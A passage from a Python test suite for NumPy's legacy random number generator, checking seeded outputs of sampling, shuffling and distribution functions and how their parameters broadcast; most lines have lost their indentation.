np.iinfo("l").max,
np.iinfo("l").max,
)
def test_random_sample(self):
random.seed(self.seed)
actual = random.random_sample((3, 2))
desired = np.array(
[
[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.random_sample()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_choice_uniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random.seed(self.seed)
actual = random.choice(["a", "b", "c", "d"], 4)
desired = np.array(["c", "d", "c", "d"])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3.0, 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(
ValueError, sample, [1, 2, 3, 4], 3, p=[[0.25, 0.25], [0.25, 0.25]]
)
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2, replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.randint(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.randint(0, -10, size=0).shape, (0,))
assert_equal(random.randint(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(["a", "b"], size=(3, 0, 4)).shape, (3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
    def test_choice_nan_probabilities(self):
        # The None entries act as NaN once p is coerced to float;
        # choice must reject non-finite probabilities with ValueError.
        a = np.array([42, 1, 2])
        p = [None, None, None]
        with np.errstate(invalid="ignore"):
            assert_raises(ValueError, random.choice, a, p=p)
    def test_choice_nontintiguous(self):
        # NOTE(review): method name has a typo ("noncontiguous"); kept as-is
        # so existing test selections/ids do not change.
        # A strided (non-contiguous) p must draw the same stream as its
        # contiguous copy.
        p = np.ones(10) / 5
        p[1::2] = 3.0
        random.seed(self.seed)
        choice1 = random.choice(5, 3, p=p[::2])
        random.seed(self.seed)
        choice2 = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
        assert_array_equal(choice1, choice2)
    def test_bytes(self):
        # Seeded regression test for raw byte output.
        random.seed(self.seed)
        actual = random.bytes(10)
        desired = b"\x82Ui\x9e\xff\x97+Wf\xa5"
        assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [
lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (
np.asarray([(i, i) for i in x], [("a", int), ("b", int)]).view(
np.recarray
)
),
# gh-4270
lambda x: np.asarray(
[(i, i) for i in x], [("a", (object, (1,))), ("b", (np.int32, (1,)))]
),
]:
random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for _ in range(50):
random.shuffle(a)
assert_equal(sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_permutation(self):
random.seed(self.seed)
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [0, 1, 9, 6, 2, 4, 5, 8, 7, 3]
assert_array_equal(actual, desired)
random.seed(self.seed)
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
def test_beta(self):
random.seed(self.seed)
actual = random.beta(0.1, 0.9, size=(3, 2))
desired = np.array(
[
[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random.seed(self.seed)
actual = random.binomial(100.123, 0.456, size=(3, 2))
desired = np.array([[37, 43], [42, 48], [46, 45]])
assert_array_equal(actual, desired)
random.seed(self.seed)
actual = random.binomial(100.123, 0.456)
desired = 37
assert_array_equal(actual, desired)
def test_chisquare(self):
random.seed(self.seed)
actual = random.chisquare(50, size=(3, 2))
desired = np.array(
[
[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006],
]
)
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array(
[
[
[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598],
],
[
[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688],
],
[
[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799],
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
def test_dirichlet_non_contiguous_alpha(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random.seed(self.seed)
non_contig = random.dirichlet(alpha, size=(3, 2))
random.seed(self.seed)
contig = random.dirichlet(np.ascontiguousarray(alpha), size=(3, 2))
assert_array_almost_equal(contig, non_contig)
def test_exponential(self):
random.seed(self.seed)
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array(
[
[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.0)
def test_f(self):
random.seed(self.seed)
actual = random.f(12, 77, size=(3, 2))
desired = np.array(
[
[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random.seed(self.seed)
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array(
[
[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0.0, scale=-0.0)
def test_geometric(self):
random.seed(self.seed)
actual = random.geometric(0.123456789, size=(3, 2))
desired = np.array([[8, 7], [17, 17], [5, 12]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random.seed(self.seed)
actual = random.gumbel(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.0)
def test_hypergeometric(self):
random.seed(self.seed)
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10], [10, 10], [9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random.seed(self.seed)
actual = random.laplace(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.0)
def test_logistic(self):
random.seed(self.seed)
actual = random.logistic(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random.seed(self.seed)
actual = random.lognormal(mean=0.123456789, sigma=2.0, size=(3, 2))
desired = np.array(
[
[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273],
]
)
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.0)
def test_logseries(self):
random.seed(self.seed)
actual = random.logseries(p=0.923456789, size=(3, 2))
desired = np.array([[2, 2], [6, 17], [3, 6]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random.seed(self.seed)
actual = random.multinomial(20, [1 / 6.0] * 6, size=(3, 2))
desired = np.array(
[
[[4, 3, 5, 4, 2, 2], [5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4], [2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3], [4, 3, 4, 2, 3, 4]],
]
)
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
random.seed(self.seed)
mean = (0.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size)
desired = np.array(
[
[
[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383],
],
[
[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306],
],
[
[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879],
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
# and that it doesn"t warn with RuntimeWarning check_valid="ignore"
assert_no_warnings(random.multivariate_normal, mean, cov, check_valid="ignore")
# and that it raises with RuntimeWarning check_valid="raises"
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="raise"
)
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="other"
)
assert_raises(ValueError, random.multivariate_normal, np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal, mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal, mu, np.eye(3))
def test_negative_binomial(self):
random.seed(self.seed)
actual = random.negative_binomial(n=100, p=0.12345, size=(3, 2))
desired = np.array([[848, 841], [892, 611], [779, 647]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100, [np.nan] * 10)
def test_noncentral_chisquare(self):
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array(
[
[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=0.5, nonc=0.2, size=(3, 2))
desired = np.array(
[
[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array(
[
[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1, size=(3, 2))
desired = np.array(
[
[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random.seed(self.seed)
actual = random.normal(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.0)
    def test_pareto(self):
        # Seeded regression test for the Pareto distribution.
        random.seed(self.seed)
        actual = random.pareto(a=0.123456789, size=(3, 2))
        desired = np.array(
            [
                [2.46852460439034849e03, 1.41286880810518346e03],
                [5.28287797029485181e07, 6.57720981047328785e07],
                [1.40840323350391515e02, 1.98390255135251704e05],
            ]
        )
        # For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
        # matrix differs by 24 nulps. Discussion:
        # https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
        # Consensus is that this is probably some gcc quirk that affects
        # rounding but not in any important way, so we just use a looser
        # tolerance on this test:
        np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random.seed(self.seed)
actual = random.poisson(lam=0.123456789, size=(3, 2))
desired = np.array([[0, 0], [1, 0], [0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo("l").max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random.seed(self.seed)
actual = random.power(a=0.123456789, size=(3, 2))
desired = np.array(
[
[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random.seed(self.seed)
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array(
[
[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.0)
def test_standard_cauchy(self):
random.seed(self.seed)
actual = random.standard_cauchy(size=(3, 2))
desired = np.array(
[
[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random.seed(self.seed)
actual = random.standard_exponential(size=(3, 2))
desired = np.array(
[
[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
random.seed(self.seed)
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array(
[
[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.0)
def test_standard_normal(self):
random.seed(self.seed)
actual = random.standard_normal(size=(3, 2))
desired = np.array(
[
[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn_singleton(self):
random.seed(self.seed)
actual = random.randn()
desired = np.array(1.34016345771863121)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
random.seed(self.seed)
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array(
[
[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random.seed(self.seed)
actual = random.triangular(left=5.12, mode=10.23, right=20.34, size=(3, 2))
desired = np.array(
[
[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random.seed(self.seed)
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array(
[
[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo("float").min
fmax = np.finfo("float").max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float, throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random.seed(self.seed)
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array(
[
[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random.seed(self.seed)
r = random.vonmises(mu=0.0, kappa=1.1e-8, size=10 ** 6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random.seed(self.seed)
r = random.vonmises(mu=0.0, kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random.seed(self.seed)
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array(
[
[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random.seed(self.seed)
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array(
[
[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random.seed(self.seed)
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.0)
def test_zipf(self):
random.seed(self.seed)
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29], [1, 1], [3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast(object):
    """Tests that distribution functions broadcast correctly when presented
    with non-scalar arguments.

    Every test follows the same recipe: for each broadcastable parameter,
    repeat that parameter three times while keeping the others length-1,
    re-seed, and check the three draws equal the same reference values.
    Invalid parameter values must raise ValueError even when broadcast.
    The reference values depend on the exact order of calls against the
    global legacy RandomState stream, so call order must not be changed.
    """

    def setup(self):
        # Fixed seed shared by every test; applied via set_seed() before
        # each sequence of reference draws.
        self.seed = 123456789

    def set_seed(self):
        """Reset the global legacy RNG to the class seed."""
        random.seed(self.seed)

    def test_uniform(self):
        low = [0]
        high = [1]
        uniform = random.uniform
        desired = np.array(
            [0.53283302478975902, 0.53413660089041659, 0.50955303552646702]
        )
        self.set_seed()
        actual = uniform(low * 3, high)
        assert_array_almost_equal(actual, desired, decimal=14)
        self.set_seed()
        actual = uniform(low, high * 3)
        assert_array_almost_equal(actual, desired, decimal=14)

    def test_normal(self):
        loc = [0]
        scale = [1]
        bad_scale = [-1]
        normal = random.normal
        desired = np.array([2.2129019979039612, 2.1283977976520019, 1.8417114045748335])
        self.set_seed()
        actual = normal(loc * 3, scale)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, normal, loc * 3, bad_scale)
        self.set_seed()
        actual = normal(loc, scale * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, normal, loc, bad_scale * 3)

    def test_beta(self):
        a = [1]
        b = [2]
        bad_a = [-1]
        bad_b = [-2]
        beta = random.beta
        desired = np.array(
            [0.19843558305989056, 0.075230336409423643, 0.24976865978980844]
        )
        self.set_seed()
        actual = beta(a * 3, b)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, beta, bad_a * 3, b)
        assert_raises(ValueError, beta, a * 3, bad_b)
        self.set_seed()
        actual = beta(a, b * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, beta, bad_a, b * 3)
        assert_raises(ValueError, beta, a, bad_b * 3)

    def test_exponential(self):
        scale = [1]
        bad_scale = [-1]
        exponential = random.exponential
        desired = np.array(
            [0.76106853658845242, 0.76386282278691653, 0.71243813125891797]
        )
        self.set_seed()
        actual = exponential(scale * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, exponential, bad_scale * 3)

    def test_standard_gamma(self):
        shape = [1]
        bad_shape = [-1]
        std_gamma = random.standard_gamma
        desired = np.array(
            [0.76106853658845242, 0.76386282278691653, 0.71243813125891797]
        )
        self.set_seed()
        actual = std_gamma(shape * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, std_gamma, bad_shape * 3)

    def test_gamma(self):
        shape = [1]
        scale = [2]
        bad_shape = [-1]
        bad_scale = [-2]
        gamma = random.gamma
        desired = np.array([1.5221370731769048, 1.5277256455738331, 1.4248762625178359])
        self.set_seed()
        actual = gamma(shape * 3, scale)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, gamma, bad_shape * 3, scale)
        assert_raises(ValueError, gamma, shape * 3, bad_scale)
        self.set_seed()
        actual = gamma(shape, scale * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, gamma, bad_shape, scale * 3)
        assert_raises(ValueError, gamma, shape, bad_scale * 3)

    def test_f(self):
        dfnum = [1]
        dfden = [2]
        bad_dfnum = [-1]
        bad_dfden = [-2]
        f = random.f
        desired = np.array(
            [0.80038951638264799, 0.86768719635363512, 2.7251095168386801]
        )
        self.set_seed()
        actual = f(dfnum * 3, dfden)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, f, bad_dfnum * 3, dfden)
        assert_raises(ValueError, f, dfnum * 3, bad_dfden)
        self.set_seed()
        actual = f(dfnum, dfden * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, f, bad_dfnum, dfden * 3)
        assert_raises(ValueError, f, dfnum, bad_dfden * 3)

    def test_noncentral_f(self):
        dfnum = [2]
        dfden = [3]
        nonc = [4]
        bad_dfnum = [0]
        bad_dfden = [-1]
        bad_nonc = [-2]
        nonc_f = random.noncentral_f
        desired = np.array([9.1393943263705211, 13.025456344595602, 8.8018098359100545])
        self.set_seed()
        actual = nonc_f(dfnum * 3, dfden, nonc)
        assert_array_almost_equal(actual, desired, decimal=14)
        # NaN non-centrality propagates NaN instead of raising.
        assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
        assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
        assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
        assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
        self.set_seed()
